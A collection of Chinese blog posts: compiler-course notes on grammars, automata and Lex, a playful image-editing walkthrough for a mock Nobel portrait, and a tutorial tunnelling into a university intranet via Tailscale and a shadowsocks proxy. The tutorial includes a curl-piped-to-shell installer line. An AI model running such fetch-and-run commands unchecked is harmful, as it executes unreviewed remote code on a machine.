  5. 如果 $i$ 是初始状态,令 $A_i$ 为所得文法的开始符号

非上下文无关的语言结构

在程序语言中,某些语言结构 不能总能用上下文无关文法 描述。

  1. 例 1 $$ L_1 = { wcw \mid w \in {a,b}^+ } $$
    • 例如,aabcaab 是 $L_1$ 的一个句子

    • 该语言是检查程序中标识符的声明应先于引用的抽象(先声明 $w$,隔了 $c$,再引用 $w$)

      int a;
      // ...
      a++;
      
  2. 例 2 $$ L_2 = { a^n b^m c^n d^m \mid n,m \geq 0 } $$
    • 它是检查程序声明的形参个数和过程调用的实参个数一致的问题的抽象(先 $n$ 个 $a$,再 $m$ 个 $b$,再 $n$ 个 $c$,再 $m$ 个 $d$)

      int f(int a, int b){
        //...
      }
      f(1, 2)
      

文法分类(Chomsky)

0 型(任意文法)

$$ G = (V_T, V_N, S, P) $$

  • 规则形式:$\alpha \rightarrow \beta, {~}{~}\alpha, \beta \in (V_T \cup V_N)^*, {~}{~}\alpha \neq \varepsilon$
  • 翻译:任意非空串到任意串
  • 推导:$\gamma \alpha \delta \Rightarrow \gamma \beta \delta$

1 型(上下文有关,Context-Sensitive Grammar)

  • 规则形式:$\alpha A \beta \rightarrow \alpha \gamma \beta,{~}{~}A \in V_N, {~}{~}\alpha, \gamma, \beta \in (V_T \cup V_N)^*,{~}{~} \gamma \neq \varepsilon$
  • 翻译:需要一个上下文(式中 $\alpha,\beta$),然后发生一次非终止符号到任意串的推导
  • 注:可以包含 $S \to \varepsilon$,但此时不允许 $S$ 出现在产生式右边

2 型(上下文无关,Context-Free Grammar, CFG)

  • 规则形式:$A \rightarrow \beta, {~}{~}A \in V_N, {~}{~}\beta \in (V_T \cup V_N)^*$
  • 翻译:没有上下文,产生式左侧只能为一个非终止符号,右侧可以为任意串
  • 上下文无关语法是没有记忆的

3 型(正则文法,Regular Grammar)

  • 右线性:$A \rightarrow aB, {~}{~}A \rightarrow a$
  • 左线性:$A \rightarrow Ba, {~}{~}A \rightarrow a, {~}{~}a \in V_T \cup { \varepsilon }$
  • 两种只能选其一
  • 翻译:产生式左侧只能为一个非终止符号,右侧最多包含两个符号,且其中一个必须是非终结符

总结

  • 每一类逐渐对产生式施加限制,表示范围逐步缩小。
  • 任意文法 > 上下文有关**(可以有记忆)> 上下文无关(没有记忆)**> 正则文法

在程序语言中的实际应用

  • 与词法相关的规则属于 正则文法

  • 与局部语法相关的规则属于 上下文无关文法

  • 与全局语法和语义有关的部分主要用 上下文有关文法 来描述,实际上很少使用

  • 为简化分析过程,会把 描述词法的正则文法描述语法的上下文无关文法 中分离出来

    在分离出正则文法后的上下文无关文法中,这些单词符号属于终结符号 $V_T$ 中的符号

💾

词法分析 III

2024年11月10日 22:03

从 NFA 构造 DFA

闭包 $\varepsilon\text{_closure}(S)$

定义:从状态集合 $S$ 中 任一状态出发,仅沿 $\varepsilon$ 弧到达的状态集合(包括 $S$ 自身)称为 $S$ 的 $\varepsilon$ 闭包,记为 $\varepsilon\text{_closure}(S)$:

$$ T = S \cup (\bigcup \text{edge}(t, \varepsilon)), \quad t \in T $$

其中,$\text{edge}(t, a)$ 是 $M$ 中从状态 $t$ 出发,仅沿 $a$ 弧到达的状态集合。

DFA M' 中的状态

  • $M'$ 中的每个状态是 $M$ 的状态集合。
  • 令 $t_0$ 是 $M$ 的初始状态,$M'$ 的初始状态 $d_0 = \varepsilon\text{_closure}({t_0})$。
  • 包含 $M$ 的任意终止状态的状态集合都是 $M'$ 中的终止状态。

DFA M' 的转移函数

$$ \text{DFAedge}(d, a) = \varepsilon\text{_closure}(\bigcup_{t \in d} \text{edge}(t, a)) $$

其中:

  • $d$ 是 $M$ 的状态集合
  • $a \in \Sigma$
  • $\text{edge}(t, a)$ 是 NFA $M$ 中从状态 $t$ 出发,仅沿 $a$ 弧到达的状态集合。

DFA 的最小化

给定 DFA $M = (\Sigma, Q, q_0, F, \delta)$,寻找一个状态数更少的 DFA $M'$,使 $L(M') = L(M)$。

可以证明,存在一个最少状态的 DFA $M'$,使 $L(M) = L(M')$。

等价状态

  • 设 $p, q \in Q$,若对任意 $w \in \Sigma^*$,$\delta(p, w) \in F$ 当且仅当 $\delta(q, w) \in F$($F$ 是终态集合),则称 $p$ 和 $q$ 是等价状态
  • 否则,称 $p$ 和 $q$ 是可区别的

等价状态的意义:如果两个状态是等价的,则可以将它们合并成一个状态而不影响 DFA 接受的语言。

等价状态的判别条件

等价状态定义了状态集合上的等价关系。因此状态集合能被划分成等价类。

两个状态 $p$ 和 $q$ 等价应满足如下条件:

  • 一致性条件:$p$ 和 $q$ 必须同时为接受状态或为非接受状态。
  • 蔓延性条件
    • 对于 $\forall a \in \Sigma$,$\delta(p, a) = r$,$\delta(q, a) = s$,$r$ 和 $s$ 必须 等价
    • 反之若 $r$ 和 $s$ 不等价,则 $p$ 和 $q$ 不等价

等价类划分方法

  1. 把所有状态划分为两个组:接受状态组和非接受状态组。
  2. 任意选定一个输入符号 $a$,判断每个组中的各个状态对于 $a$ 的转换,如果落入不同的组中,就把该组中的状态按照转换之后的组进行分割,使分割之后的每个组对于 $a$ 的转换都落入同一个组。
  3. 重复第 2 步,直至每个组中的所有状态都等价。

感觉是一个不断二分的过程?

例子

dfa_minimize_1

dfa_minimize_2

从正则表达式构造 FA(有限自动机)

定理:设 $r$ 是 $\Sigma$ 上一个正则表达式,则存在 FA $M$ 接受 $L(r)$,并且 $M$ 的终态是唯一的且无有向边射出。

证明:对正则表达式 $r$ 的 运算符数目 作归纳。

设 $r$ 具有零个运算符,必有 $r=\varepsilon$ 或 $r=\varnothing$ 或 $r=a \in \Sigma$,则 FA 分别为:

reg_fa

设结论对少于 $i$($i\leq1$)个运算的正则表达式 $r$ 成立。

当 $r$ 有 $i$ 个运算时,有三种情况:

  • $r = r_1 \mid r_2$
  • $r = r_1 r_2$
  • $r = r_1^*$

有 $M_1=(\Sigma_1, Q_1, q_1, F_1, \delta_1)$,$M_2=(\Sigma_2, Q_2, q_2, F_2, \delta_2)$ 且 $L(M_1)=L(r_1)$,$L(M_2)=L(r_2)$。

由 $M_1$ 和 $M_2$ 构造 $M$,使得 $L(M)=L(r)$,构造方法如图示如下:

  • 情况 1:$r = r_1 \mid r_2$

    regex_1

  • 情况 2:$r = r_1 r_2$

    regex_2

  • 情况 3:$r = r_1^*$

    regex_3

由此可以证明:假定知道 $r$ 的计算顺序,对于任意正则表达式 $r$,可以构造一个 FA $M$,使得 $L(M)=L(r)$。

转换得到的 NFA 的特性

  • 状态数量最多为 $r$ 中的运算符和运算符分量总数的两倍
    • 因为每个步骤只引入两个状态
  • 有且只有一个开始状态和一个接受状态
  • 除接受状态之外,每个状态要么有一条标号不为 $\varepsilon$ 的出边,要么有两条标号为 $\varepsilon$ 的出边

NFA 合并的方法

  1. 引入新状态:引入新的开始状态 $s_0$,并引入从这个开始状态到各个原开始状态的 $\varepsilon$ 转换
  2. 语言并集:得到的 NFA 所接受的语言是原来各个 NFA 语言的 并集
  3. 不同接受状态:不同的接受状态可代表不同的模式
  4. 模式识别:不仅判断输入前缀是否 NFA 的语言,还需知道对应于哪个模式

nfa_merge

NFA 到 DFA 的转换

  1. 确定化:对得到的 NFA 进行确定化,得到 DFA。

    可进一步对得到的 DFA 的状态进行最小化。

  2. 状态集合:一个 DFA 的接受状态对应于 NFA 状态的集合,其中 至少包括一个 NFA 接受状态

    如果其中包括多个对应于不同模式的 NFA 接受状态,则表示当前的输入前缀对应于多个模式,存在冲突。

  3. 模式输出:找出第一个这样的模式,将这个模式作为这个 DFA 接受状态的输出。

例子

image-20241109074237696

image-20241109074244234

image-20241109074255086

运行的方式

  1. 模拟 DFA,不断读入字符串中的字符,直到某一时刻没有后继为止(不是达到某个接受状态)
  2. 回头查找最后的接受状态,执行相应的动作
    • 如果查不到,报告词法错误
    • 在回退时,需要同时回退读入的字符

💾

词法分析 II

2024年11月10日 22:02

状态转换图 (Transition Diagram)

状态 (State):在识别词素时可能出现的情况,即对表示已处理部分的总结。

  • 接受状态或最终状态:表示找到词素。
  • 加上 * 的接受状态:表示最后读入的符号不在词素中。
  • 开始状态(初始状态):用 “开始 / Start” 边表示。

边 (Edge):从一个状态指向另一个状态,边的标号是一个或多个符号。

  • 当前状态为 $s$,下一个输入符号为 $a$,则从 $s$ 沿着标号为 $a$ 的边到达下一个状态 $s \xrightarrow{a} s'$

词法单元的自动识别

基本目标:判断一个串 $s$ 是否属于一个正则表达式 $R$ 表示的语言:

$$ s \in L(R) $$

词法自动识别过程

  1. 分别为每一类词法单元写出正则表达式 $R_i$
  2. 构造一个正则表达式 $R$ 来匹配所有的词法单元: $$ R = R_1 | R_2 | \ldots | R_k $$
  3. 输入为 $x_1 x_2 \ldots x_n$,对于 $1 \leq i \leq n$,检查是否 $x_1 \ldots x_i \in L(R)$
  4. 如果匹配成功,则存在 $j$,使得 $x_1 \ldots x_i \in L(R_j)$
  5. 把 $x_1 \ldots x_i$ 从输入中移走,继续执行步骤(3)

匹配过程中需要解决的问题

  1. 确定匹配长度:可能有多种前缀,选择最长匹配。
  2. 选择正则表达式:可能有多个正则表达式匹配,优先匹配前面的。
  3. 无法匹配:构造一个 ERROR 正则表达式,放在表末尾,用于报错。

Lex

Lex:一种词法分析程序自动构造工具,通常与 Yacc 一起使用,生成编译器前端。

实现原理:根据正则表达式自动生成词法分析程序,利用正则表达式与 DFA 的等价性。

转换方式:正则表达式 $\Rightarrow$ NFA $\Rightarrow$ DFA $\Rightarrow$ min DFA

用 Lex 建立词法分析程序的过程

lex_process

词法分析器的工作方式

  • Lex 生成的词法分析器作为函数被调用
  • 每次调用过程中读取输入符号
  • 发现最长的匹配输入前缀时,执行相应动作
    • 动作处理并返回控制
    • 如果不返回,继续寻找词素

Lex 源程序

由三部分组成:声明、转换规则及动作、辅助子程序

各部分用 %% 隔开

声明

  • 包括变量、C 语言常量和正则定义式

转换规则及动作

  • 形式:p_i {动作 i}
  • 识别某类单词时,执行相应动作
  • 动作用 C 语言书写

辅助子程序

  • 执行动作所需的 C 语言程序,可单独编译

Lex 冲突解决方法:优先按规则顺序匹配,规则在前者优先。

Lex 程序示例

%{
/* 定义常量 */
LT, LE, EQ, NE, GT, GE, IF, THEN, ELSE, ID, NUMBER, RELOP
%}

/* 正则定义 */
delim       [\t\n]
ws          {delim}+
Letter      [A-Za-z]
digit       [0-9]
id          {Letter}({Letter}|{digit})*
Number      {digit}+(\.{digit}+)?(E[+-]?{digit}+)?

%%

{ws}        {/* 不返回 */}
if          {return(IF);}
then        {return(THEN);}
else        {return(ELSE);}
{id}        {yylval = (int) installID(); return(ID);}
{number}    {yylval = (int) installNum(); return(NUMBER);}
"<"         {yylval = LT; return(RELOP);}
"<="        {yylval = LE; return(RELOP);}
"=="        {yylval = EQ; return(RELOP);}
"!="        {yylval = NE; return(RELOP);}
">"         {yylval = GT; return(RELOP);}
">="        {yylval = GE; return(RELOP);}

%%

int installID() {/* 添加符号表指向 yytext */}
int installNum() {/* 添加数字常量到表格 */}

yylval 是 Lex 提供的变量,用于返回词法单元的值。

有限自动机 (Finite Automata)

有限自动机是词法分析器生成工具(Lex)的关键技术。

正则表达式 $\rightarrow$ 有限自动机 $\rightarrow$ 词法分析程序

识别功能:有限自动机与状态转换图类似,只能对每个可能的输入串简单地回答 “yes” 或 “no”。

分类

  • 确定的有限自动机(Deterministic Finite Automaton, DFA
  • 不确定的有限自动机(Nondeterministic Finite Automaton, NFA

确定的有限自动机 (DFA)

定义:一个确定的有限自动机 $M$(记作 DFA $M$)是一个五元组 $M = (\Sigma, Q, q_0, F, \delta)$,其中:

  1. $\Sigma$ 是一个有限字母表,称为输入符号。

  2. $Q$ 是一个有限状态集合。

  3. $q_0 \in Q$,称为初始状态。

  4. $F \subseteq Q$,称为终止状态(或接受状态)集合。

  5. $\delta$ 是一个从 $Q \times \Sigma \to Q$ 的单值映射(称为转换函数)

    即:$\delta(q, a) = q' \quad (q, q' \in Q, a \in \Sigma)$ 表示当前状态为 $q$,输入符号为 $a$ 时,自动机 $M$ 将转换到下一个状态 $q'$,$q'$ 称为 $q$ 的一个后继

DFA 接受的语言

如果 DFA 中存在一条 从初始状态到接受状态 的路径,路径上的符号序列构成的字符串是 $w$,那么该 DFA 可以接受字符串 $w$。

  • $\delta(q, \varepsilon) = q$
  • $\delta(q, wa) = \delta(\delta(q, w), a)$
  • $L(M) = {w \mid w \in \Sigma^*, \text{若存在} q \in F \text{(接受状态)}, \text{使} \delta(q_0, w) = q}$

表示形式

  • 转移矩阵
  • 状态转换图

expression

举例

识别 $\Sigma={0,1}$ 上能被能 $5$ 整除的二进制数

dfa_example

(0|1(10)*(0|11)(01*01|01*00(10)*(0|11))*1)*

先画出 DFA,然后从 0 开始,转换到 1,转换到 2,再转换到 0。中间有环路的描述。

这里每条转换的 $q \xrightarrow{a} q':q' = (2 \times q + a) % 5$ 。

不确定的有限自动机(NFA)

定义:NFA 是一个五元组 $M = (\Sigma, Q, q_0, F, \delta)$,其中:

  1. $\Sigma$ 是一个有限字母表,称为输入符号。
  2. $Q$ 是一个有限状态集合。
  3. $q_0 \in Q$,称为初始状态。
  4. $F \subseteq Q$,称为终止状态(或接受状态)集合。
  5. $\delta$ 是一个从 $Q \times (\Sigma \cup {\varepsilon}) \to 2^Q$ 的映射(称为转换函数,$2^Q$ 表示 $Q$ 的幂集)

NFA 接受的语言

如果 NFA 中存在一条 从初始状态到接受状态 的路径,路径上的符号序列构成的字符串是 $w$,那么该 NFA 可以接受字符串 $w$,记作 $w \in L(M)$。

关于 NFA 的说明

  1. 接受的字符串和语言
    • 字符串在 NFA 中可能对应不同的接受路径。
    • 接受的字符串可能存在其他不能接受的路径。
    • 如果某状态对输入字符 $a$ 不存在可用的转移动作,则不能通过该路径接受当前字符串。
  2. DFA 是 NFA 的一种特例:DFA 的表达能力与 NFA 等价。

💾

词法分析 I

2024年11月10日 22:01

词法分析器

  • 读入源程序字符流,输出 token 序列
  • 过滤空白 / 换行 / 制表符 / 注释
  • 将 token 信息添加到符号表
  • 逻辑上独立于语法分析,但是通常和语法分析器在同一 Pass

lexical-analyzer

基础概念

词法单元 token

结构:<词法单元名, 属性值(可选)>

  • 单元名:表明该词法单位的种类,是表示词法单位种类的抽象符号,词法分析器通过各 token 的单元名即可确定词法单元序列的结构
  • 属性值:可选,用于语义分析之后的阶段

模式 pattern

描述一类词法单元的词素可能具有的形式

词素 lexeme

  • 源程序中的字符序列
  • 如果一个词素和某个 token 的模式相匹配,它会被词法分析器识别为该 token 的实例

词法分析器的功能

  • 识别词法单元 token
  • 去除注释 / 空白 / 空行 / 制表符
  • 将编译器生成的错误信息关联到源文件
  • 可能要进行一些 预处理:识别宏 macro;宏的扩展

token 的类别

  • 关键字 Keyword:if, else, while, return,没有属性值
  • 标识符 Identifier:变量名等
  • 字面常数 Literal:12,true,1e+3
  • 运算符 Operator:+ - * /
  • 分界符 Delimiter:逗号 / 分号 / 冒号 /etc

词法分析器的输出

Token 的基本输出格式:<类别编码, 词法单元自身的属性值>

在词法分析过程中,有时候需要无限长的向前看

词法分析的设计

  • 可以实现为单独的一个扫描(pass)
  • 也可以作为语法分析 / 语义分析的子程序,即每调用一次 getToken() 函数即获得一个 token

语言和正则表达式

规约(Specification):用正则表达式来描述处理词法单元时用到的模式类型

字母表 Alphabet

字母表:符号的非空有穷集合

每一程序语言都有自己的字母表

  • 机器语言:符号 01
  • ASCII 字符集

符号串 String / 字 word

已知字母表 $\Sigma$

  1. $ε$ 是 $\Sigma$ 上的一个 符号串 (空串)
  2. 若 $\alpha$ 是 $\Sigma$ 上的符号串,而 $a$ 是 $\Sigma$ 的元素,则 $\alpha a$ 是 $\Sigma$ 上的符号串。
  3. $\beta$ 是 $\Sigma$ 上的符号串,当且仅当它由 1 和 / 或 2 导出(递归定义)。

定义:由字母表中的符号所组成的 任意有穷序列 被称为该字母表上的 符号串(String),也称作 字(Word)

通常约定

  • 靠前的小写字母表示 符号:$a, b, c$
  • 小写希腊字母或靠后的小写英文字母表示 符号串:$α, β, γ, x ,y ,z$
  • $ε$ 通常表示 空串
  • 大写字母表示 符号串集合:$A,B,C$

相关概念

设 $x$ 是一个符号串,定义如下概念:

  • 前缀(prefix):移走 $x$ 尾部的 零个 或多个连续的符号。
  • 后缀(suffix):移走 $x$ 头部的 零个 或多个连续的符号。
  • 子串(substring):从 $x$ 中删去一个前缀和一个后缀。
  • 真前缀 / 真后缀 / 真子串:首先要非空(和集图不同),而且不等,即 $y\neq x\mathrm{~}&\mathrm{~}y\neq\mathbf{\varepsilon}$
  • 子序列(subsequence):从 $x$ 中删去 零个或多个 符号(这些符号 不要求是连续的 )。
  • 逆转(reverse) :或称转置,用 $x^R$ 表示。将 $x$ 中的符号按相反次序写出而得到的符号串。
  • 长度(length) :符号串中的符号的数目。如 $|aab| = 3$,$|\varepsilon| = 0$

符号串的运算

  1. 连接 (concatenation)

    设 $x$ 和 $y$ 是符号串,它们的连接 $xy$ 是把 $y$ 的符号写在 $x$ 的符号之后得到的符号串。

    例如,$x = ba,{~}y = nana\Rightarrow{~}xy = banana$

  2. 方幂 (exponentiation)

    • $x^0 = \varepsilon$
    • $x^1 = x$
    • $x^2 = xx$
    • $x^n = x^{n-1}x$

语言(符号串集合)

语言(language):某个给定字母表上的一个任意的可数的符号串集合。

语言的例子

  • 空集 $\varnothing$
  • 只包含空串的集合 ${\varepsilon}$
  • 所有符合规范的 C 语言标识符的集合
  • 所有语法正确的 C 语言程序的集合
  • 所有语法正确的英语句子的集合

语言的运算

设 $L$ 和 $M$ 是两个符号串集合,则:

  1. 合并 (union) $$ L \cup M = {s | s \in L \text{ 或 } s \in M} $$

  2. 连接 (concatenation) $$ LM = {st | s \in L \text{ 且 } t \in M} $$

  3. 方幂 (exponentiation)

    • $L^0 = {\varepsilon}$
    • $L^1 = L$
    • $L^2 = LL$
    • $L^n = L^{n-1}L$
  4. 语言 $L$ 的 Kleene 闭包(closure)

    记作 $L^*$:

    $$ L^* = \bigcup_{i \geq 0} L^i = L^0 \cup L^1 \cup L^2 \cup L^3 \cup \ldots $$

  5. 语言 $L$ 的正闭包(positive closure)

    记作 $L^+$:

    $$ L^+ = L \cdot L^* $$

    $$ L^+ = \bigcup_{i \geq 1} L^i = L^1 \cup L^2 \cup L^3 \cup L^4 \cup \ldots $$

辨析

  1. 空集 $\varnothing$:空集是一个不包含任何元素的集合。
  2. 只包含空串的集合 ${\varepsilon}$:这个集合包含一个元素,即空串 $\varepsilon$。空串是长度为零的字符串。

运算性质:

  • 空集 $\varnothing$:没有元素。

    因此,对于任何集合 $M$,有:

    $$ \varnothing M = M \varnothing = \varnothing $$

    因为空集与任何集合的笛卡尔积仍然是空集

  • 集合 ${\varepsilon}$:只包含空串。

    这个集合包含一个元素 $\varepsilon$。对于任何集合 $M$,有:

    $$ {\varepsilon} M = M {\varepsilon} = M $$

    因为空串与任何字符串的连接操作不会改变字符串

正则表达式与正则语言 Regular Expression

定义:某个字母表 $\Sigma$ 上的正则表达式及其对应的正则集合(正则语言),满足以下条件:

  1. $\varepsilon$ 是一个正则表达式,表示的语言 $L(\varepsilon) = {\varepsilon}$。
  2. 若 $a \in \Sigma$,$a$ 是一个正则表达式,$L(a) = {a}$。
  3. 归纳步骤:设 $r$ 和 $s$ 是 $\Sigma$ 上的正则表达式:
    • $(r) | (s)$ 是一个正则表达式,表示语言 $L(r) \cup L(s)$,即或
    • $(r)(s)$ 是一个正则表达式,表示语言 $L(r) L(s)$,即连接在一起
    • $(r)^$ 是一个正则表达式,表示语言 $(L(r))^$,即重复
    • $(r)$ 是一个正则表达式,表示语言 $L(r)$

注意:去掉一个正则表达式中的冗余括号之后,它表示的正则语言不变(注意运算的优先级)。

正则表达式示例

例:$\Sigma = {a, b}$

  • $a | b$:${a, b}$
  • $(a | b)(a | b)$:${aa, ab, ba, bb}$
  • $a^*$:${\varepsilon, a, aa, aaa, aaaa, \dots}$
  • $(a | b)^$ 或 $(a^b^)^$:${\varepsilon, a, b, aa, ab, ba, bb, aaa, \dots}$
  • $a^*b$:${b, ab, aab, aaab, \dots}$

C 语言标识符可视化

(A|B|...|Z|a|b|...|z|_)((A|B|...|Z|a|b|...|z|_ |0|1|...|9))*
// [A-Z_][A-Za-z0-9_]*

有符号整数可视化

(+|-|ε)(0|1|...|9)(0|1|...|9)*
// [+-]?[0-9][0-9]*

正则表达式的性质

设 $e_1, e_2, e_3$ 均为某字母表上的正则表达式,则有:

  • 单位正则表达式 $\varepsilon$:$\varepsilon e = e \varepsilon = e$
  • 交换律:$e_1 | e_2 = e_2 | e_1$
  • 结合律:$e_1 | (e_2 | e_3) = (e_1 | e_2) | e_3$,$e_1(e_2 e_3) = (e_1 e_2)e_3$
  • 分配律:$e_1(e_2 | e_3) = e_1 e_2 | e_1 e_3$,$(e_1 | e_2)e_3 = e_1 e_3 | e_2 e_3$

此外:

  • $r^* = (r\varepsilon)^*$
  • $r^{**} = r^*$
  • $(r|s)^* = (r^* s^)^$

正则定义(Regular Definition)

正则定义是如下形式的定义序列:

$$ D_1 \rightarrow R_1 \ D_2 \rightarrow R_2 \ \vdots \ D_n \rightarrow R_n $$

其中:

  • $R_1, R_2, \ldots, R_n$ 为正则表达式。
  • $D_1, D_2, \ldots, D_n$ 为正则表达式名字。

限定:在 $R_i$ 中只能出现字母表 $\Sigma$ 中的字符,以及前面已定义的正则表达式名字,即 $D_1, D_2, \ldots, D_{i-1}$。

我们用这种辅助定义式(相当于规则)来定义程序语言的单词符号。

正则表达式的扩展形式

为了表达的方便,通常可以对正则表达式做如下的扩展:

  • 1 次或多次出现:$(r)+$ 用来表示 $L(r)+$

    $r^* = r+|\varepsilon \quad r+ = rr^* = r^* r$

  • 0 次或 1 次出现:$r?$ 用来表示 $r | \varepsilon$

    也就是 $L(r) \cup {\varepsilon}$

  • 字符类:$[abc]$ 表示 $a|b|c$;$[a-z]$ 表示 $a|b|c|\ldots|z$

建议看 RegexLearn

例题

写出语言 “所有相邻数字都不相同的非空数字串” 的正则定义。

解答:正则定义如下

$$ \begin{aligned} &\text{answer} & \rightarrow &\ (0 \mid \text{no_0}\ 0)(\text{no_0}\ 0)^(\text{no_0} \mid \varepsilon) \mid \text{no_0} \ &\text{no_0} & \rightarrow &\ (1 \mid \text{no_0-1}\ 1)(\text{no_0-1}\ 1)^(\text{no_0-1} \mid \varepsilon) \mid \text{no_0-1} \ &{~~~}\vdots & &\ \ &\text{no_0-8} & \rightarrow &\ 9 \ \end{aligned} $$

将这些正则定义逆序排列就是答案。

  1. 顶层规则 answer

    • answer 可以是以 0 开头的数字串,或者以 no_0 开头的数字串。
    • 对于以 0 开头的串,后面可以跟任意多个 (no_0 0),最后再跟一个 no_0 或者为空($\varepsilon$)。
    • 对于以 no_0 开头的串,直接匹配 no_0
  2. 子表达式 no_0

    • no_0 代表不能以 0 开头的数字串,其定义类似于 answer,但替换了数字。
    • no_0 可以是以 1 开头,后面可以跟任意多个 (no_0-1 1),最后再跟一个 no_0-1 或者为空($\varepsilon$)。
    • 对于以 no_0-1 开头的串,直接匹配 no_0-1
  3. 递归定义

    • 其他子表达式 no_0-1no_0-2,直到 no_0-8,都以类似的方式定义,保证生成的串中相邻数字始终不同。
    • 最终,no_0-8 只能匹配 9

💾

伪造一张诺贝尔奖获奖照片

2024年10月11日 17:20

本设计想法来自微信群,有同学发了一张伪造的校长获奖图片,于是我也想自己试一试,表彰一下我同学在过去几年内在鸽子学领域里所做出的卓越贡献。

首先,分析一下由插画家设计的原图:

origin

我们发现,伪造一张类似图片的最大难度在于人物图像处理,其包括了外围的黑色简笔画和内部金色的人像阴影。

思路有了,接下来就是制作了,本来已经用同学的照片做了一张了,但是出于版权考量(鸽王本人不太愿意直接用他的肖像公开在网络上),我们使用来自 pexel 网站的免费可商用人物肖像做示例。

model-photo-origin

Source: https://www.pexels.com/zh-cn/photo/220453/

简单抠个图:

model-photo-transparent

ok,接下来进行风格化处理。我们打开 Snap Art,开始挑选适合的绘画风格,这一步时我们发现 SnapArt 不支持 PNG 格式图片,故而重新先用 Photoshop 将其转化为白底 JPG 图片后导入,这个过程我一共做了三张图片,分别为黑色基础照片、灰色阴影照片、衣物描边照片。

snap-art

从左至右依次为:衣物描边照片、黑色基础照片、灰色阴影照片

  • 阴影图片选择模式 - 正片叠底
  • 金色图案叠加则选择模式 - 叠加。

如此一通操作,简单的模仿便完成了,由于原图模特同时具有大胡子 + 眼镜,所以这种非绘画形式的图片处理就会显的有些拙劣。当然你也可以选择用 SnapArt 处理完简笔后再用 Procreate 自己填充金色阴影,不过由于我是个手残,于是只能选择相信机器处理 2333。

做完这些后,我们再新建一个画布,调整大小、填充背景纸张纹路,仿制原图色块和文字(字体为大名鼎鼎的 Avenir,需调整字间距进拟合),期间需要使用色彩选择工具去除仿制图片的纯白色以凸显底部纸张纹路,最终,我们便能得到我们想要的效果:

final

💾

PKU VPN 3 - 用校内服务器实现 PKU 内网和 Clash/Surge 兼容使用

2024年9月21日 06:19

近来不知道学校 VPN 又开始抽什么风,原先还算稳定的 docker 内 openconnect 方案突然变得极不稳定,经常断连,动不动就显示:

ESP session established with server
ESP detected dead peer
ESP session established with server

这显然是无法接受的,打开一个网页都能卡半天,谁受得了啊!

于是,一个新的、稳定的方案诞生了。

新的代理链路为:

Clash/Surge -> tailscale -> 校内服务器/北大内网

我们使用 Tailscale 作为内网穿透工具,将身处内网的机器暴露出来,从而就能在任何外网机器上通过其来间接访问北大内网。

Tailscale

注册一个 Tailscale 账号,然后在 下载页面 安装 macOS / Windows 客户端。

安装完成后,在你的电脑上启动它。

校内服务器

Tailscale

以下假设你的校内服务器是 ubuntu 系统,进入终端:

curl -fsSL https://tailscale.com/install.sh | sh # 安装 Tailscale
sudo tailscale up # 启动 Tailscale

这会跳出一个形如:

https://login.tailscale.com/a/xxxxxxxx

的链接,在你自己电脑上打开它,登录你的 Tailscale 账号,然后按照指引进行操作,便能在校内服务器上成功登录 Tailscale。

代理服务器

随后,我们需要在校内服务器上启动一个代理服务器,你可以选择 v2ray / shadowsocks 等,这里以 shadowsocks 为例。

首先,安装 shadowsocks:

pip install shadowsocks

在某一目录(假设为 ~/.config/shadowsocks)下创建一个 config.json 文件:

{
  "server": "0.0.0.0",
  "server_port": 1898,
  "password": "your_password",
  "method": "aes-256-cfb",
  "timeout": 300
}

然后启动 ssserver

ssserver -c ~/.config/shadowsocks/config.json --pid-file ~/.config/shadowsocks/PID.log --log-file ~/.config/shadowsocks/LOG.log -d start

即可完成代理服务器的部署。

然而,如果你的 Python 版本比较高,你可能会遇到各种 AttributeError 的问题,我就遇到了如下两个问题:

Traceback (most recent call last):
  File "/home/ubuntu/.miniconda3/bin/ssserver", line 5, in <module>
    from shadowsocks.server import main
  File "/home/ubuntu/.miniconda3/lib/python3.12/site-packages/shadowsocks/server.py", line 27, in <module>
    from shadowsocks import shell, daemon, eventloop, tcprelay, udprelay, \
  File "/home/ubuntu/.miniconda3/lib/python3.12/site-packages/shadowsocks/udprelay.py", line 71, in <module>
    from shadowsocks import encrypt, eventloop, lru_cache, common, shell
  File "/home/ubuntu/.miniconda3/lib/python3.12/site-packages/shadowsocks/lru_cache.py", line 34, in <module>
    class LRUCache(collections.MutableMapping):
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^
AttributeError: module 'collections' has no attribute 'MutableMapping'

此时,我们打开报错的文件 /home/ubuntu/.miniconda3/lib/python3.12/site-packages/shadowsocks/lru_cache.py

修改其中的 collections.MutableMappingcollections.abc.MutableMapping 即可。^1

AttributeError: /home/ubuntu/.miniconda3/lib/python3.12/lib-dynload/../../libcrypto.so.3: undefined symbol: EVP_CIPHER_CTX_cleanup. Did you mean: 'EVP_CIPHER_CTX_new'?

此时,我们同样打开报错的文件 openssl.py,修改 CIPHER_CTX_cleanupCIPHER_CTX_reset 即可。^2

检查代理服务器

tail -f ~/.config/shadowsocks/LOG.log

如果发现如下内容,则说明代理服务器已经成功启动:

2024-09-20 21:41:16 INFO     starting server at 0.0.0.0:1898

守护进程

你可以使用 tmux 或者 pm2 来作为守护进程避免代理的中断,以下给出一个 pm2 的配置文件示例:

module.exports = {
    apps: [
        {
            name: 'Shadowsocks',
            script: 'ssserver',
            args: 'c ~/.config/shadowsocks/config.json --pid-file ~/.config/shadowsocks/PID.log --log-file ~/.config/shadowsocks/LOG.log start',
            interpreter: '/home/ubuntu/.miniconda3/bin/python',
            log_date_format: 'YYYY-MM-DD HH:mm:ss',
        },
    ],
};

注意,这里有意移除了 -d 参数,因为我们希望用 pm2 来管理守护进程,并且通过 pm2 ls 来查看进程状态,而不是直接在后台运行(另起守护进程)。

然后,使用 pm2 start 启动守护进程即可。

配置本机代理

Surge

最小配置如下:

[Proxy]
PKU = ss, 100.255.255.255, 1898, encrypt-method=aes-256-cfb, password=your_password

[Proxy Group]
🎓 北京大学 = select, PKU, DIRECT

[Rule]
DOMAIN-SUFFIX,pku.edu.cn,🎓 北京大学
IP-CIDR,10.0.0.0/8,🎓 北京大学
IP-CIDR,162.105.0.0/16,🎓 北京大学
IP-CIDR,115.27.0.0/16,🎓 北京大学

其中,100.255.255.255 是校内服务器在 Tailscale 上组网的内网 IP 地址。

Clash

最小配置如下:

proxies:
-   cipher: aes-256-cfb
    name: PKU
    password: your_password
    port: 1898
    server: 100.255.255.255
    type: ss

proxy-groups:
-   name: 🎓 北京大学
    proxies:
    - PKU
    - DIRECT
    type: select

rules:
- DOMAIN-SUFFIX,pku.edu.cn,🎓 北京大学
- IP-CIDR,10.0.0.0/8,🎓 北京大学
- IP-CIDR,162.105.0.0/16,🎓 北京大学
- IP-CIDR,115.27.0.0/16,🎓 北京大学

最后,在你的代理软件中为对应规则分流选择 PKU 节点即可。

